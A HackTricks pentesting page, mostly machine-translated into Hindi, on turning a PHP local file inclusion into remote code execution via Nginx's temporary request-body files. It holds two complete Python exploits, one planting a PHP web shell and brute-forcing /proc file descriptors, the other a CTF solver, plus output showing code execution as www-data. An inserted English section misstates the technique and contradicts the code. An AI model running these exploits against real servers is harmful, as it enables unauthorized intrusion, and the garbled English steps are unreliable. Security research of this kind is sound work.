hacktricks/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

16 KiB

LFI2RCE एनजिनक्स टेम्प फ़ाइल के माध्यम से

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

भेद्य समाकृति

  • PHP कोड:
<?php include_once($_GET['file']);
  • FPM / PHP कॉन्फ़िग:
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
  • सेटअप / हार्डनिंग:
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...

भाग्य से वर्तमान में PHP अक्सर PHP-FPM और Nginx के माध्यम से डिप्लॉय होता है। Nginx एक आसानी से छूट जाने वाली client body buffering सुविधा प्रदान करता है जो एक निश्चित सीमा से अधिक होने पर अस्थायी फ़ाइलें लिखेगी यदि क्लाइंट बॉडी (पोस्ट करने के लिए सीमित नहीं है)।

यदि Nginx व्यापक रूप से www-data के रूप में PHP के साथ चलता है (बहुत आम रूप से किया जाता है), तो यह सुविधा LFIs को फ़ाइलें बनाने के किसी अन्य तरीके के बिना भी उत्पन्न करने की अनुमति देती है।

संबंधित Nginx कोड:

ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
ngx_fd_t  fd;

fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
access ? access : 0600);

if (fd != -1 && !persistent) {
(void) unlink((const char *) name);
}

return fd;
}

यह दिखाई देता है कि tempfile को Nginx द्वारा खोलने के तुरंत बाद अनलिंक किया जाता है। भाग्य से procfs का उपयोग करके हटाए गए फ़ाइल का संदर्भ प्राप्त किया जा सकता है एक रेस के माध्यम से:

...
/proc/34/fd:
total 0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...

नोट: इस उदाहरण में /proc/34/fd/15 को सीधे शामिल नहीं किया जा सकता है क्योंकि PHP की include फ़ंक्शन पथ को /var/lib/nginx/body/0000001368 (deleted) में रेज़ॉल्व करेगी जो फ़ाइलसिस्टम में मौजूद नहीं है। यह छोटी सी प्रतिबंधता भाग्य से कुछ इंद्रधनुष के द्वारा दूर की जा सकती है जैसे: /proc/self/fd/34/../../../34/fd/15 जो अंततः हटाए गए /var/lib/nginx/body/0000001368 फ़ाइल की सामग्री को निष्पादित करेगा।

पूर्ण शोषण

#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r  = requests.get(URL, params={
'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r  = requests.get(URL, params={
'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
r  = requests.get(URL, params={
'file': f'/proc/{pid}/cmdline'
})

if b'nginx: worker process' in r.content:
print(f'[*] nginx worker found: {pid}')

nginx_workers.append(pid)
if len(nginx_workers) >= cpus:
break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
print('[+] starting uploader')
while not done:
requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')

for _ in range(16):
t = threading.Thread(target=uploader)
t.start()

# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
global done

while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(4, 32):
f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
r  = requests.get(URL, params={
'file': f,
'c': f'id'
})
if r.text:
print(f'[!] {f}: {r.text}')
done = True
exit()

for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()

LFI to RCE via Nginx Temp Files

Introduction

In this technique, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) by leveraging Nginx temporary files. This technique is effective when the target server is running Nginx web server and has a misconfigured or vulnerable LFI vulnerability.

Prerequisites

To perform this attack, you need the following:

  • A target server running Nginx web server.
  • Knowledge of the target's file system structure.
  • A vulnerable LFI vulnerability on the target server.

Exploitation Steps

  1. Identify the LFI vulnerability: Find a parameter or input field that is vulnerable to LFI on the target website.

  2. Exploit the LFI vulnerability: Inject a payload that includes the path to the Nginx temporary files directory. This can be achieved by appending the following payload to the vulnerable parameter:

    /var/lib/nginx/tmp/client_body/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    

    Replace the X characters with a unique filename.

  3. Trigger the payload: Submit the request containing the payload to the target server.

  4. Monitor the Nginx temporary files directory: Check the Nginx temporary files directory to see if the payload file has been created. The path to the directory can be found in the Nginx configuration file.

  5. Execute the payload: If the payload file is successfully created, it means that the LFI vulnerability has allowed us to write files to the server. Now, we can execute arbitrary commands by injecting them into the payload file.

Conclusion

By leveraging Nginx temporary files, we can exploit an LFI vulnerability to achieve RCE on a target server running Nginx web server. This technique can be used to gain unauthorized access and execute arbitrary commands on the target system. It is important to note that this technique should only be used for ethical purposes, such as penetration testing and security research.

$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
[*] nginx worker found: 33
[*] nginx worker found: 34
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 33
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)

एक और अभिशाप

यह https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/ से है।

import requests
import threading
import multiprocessing
import threading
import random

SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False

def create_requests_session():
session = requests.Session()
# Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
session.mount('http://', adapter)
return session

def get_nginx_pids(requests_session):
if USE_NGINX_PIDS_CACHE:
return NGINX_PIDS_CACHE
nginx_pids = set()
# Scan up to PID 200
for i in range(1, 200):
cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
if cmdline.startswith("nginx: worker process"):
nginx_pids.add(i)
return nginx_pids

def send_payload(requests_session, body_size=1024000):
try:
# The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
payload = '<?php system("/readflag"); ?> //'
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass

def send_payload_worker(requests_session):
while True:
send_payload(requests_session)

def send_payload_multiprocess(requests_session):
# Use all CPUs to send the payload as request body for Nginx
for _ in range(multiprocessing.cpu_count()):
p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
p.start()

def generate_random_path_prefix(nginx_pids):
# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
path = ""
component_num = random.randint(0, 10)
for _ in range(component_num):
pid = random.choice(nginx_pids)
if random.randint(0, 1) == 0:
path += f"/proc/{pid}/cwd"
else:
path += f"/proc/{pid}/root"
return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
nginx_pid_list = list(nginx_pids)
while True:
path = generate_random_path_prefix(nginx_pid_list)
path += f"/proc/{nginx_pid}/fd/{fd}"
try:
d = requests_session.get(SERVER + f"/?action=include&file={path}").text
except:
continue
# Flags are formatted as hxp{<flag>}
if "hxp" in d:
print("Found flag! ")
print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
for fd in range(10, 45):
thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
for nginx_pid in nginx_pids:
p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
p.start()

if __name__ == "__main__":
print('[DEBUG] Creating requests session')
requests_session = create_requests_session()
print('[DEBUG] Getting Nginx pids')
nginx_pids = get_nginx_pids(requests_session)
print(f'[DEBUG] Nginx pids: {nginx_pids}')
print('[DEBUG] Starting payload sending')
send_payload_multiprocess(requests_session)
print('[DEBUG] Starting fd readers')
read_file_multiprocess(requests_session, nginx_pids)

लैब्स

संदर्भ

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥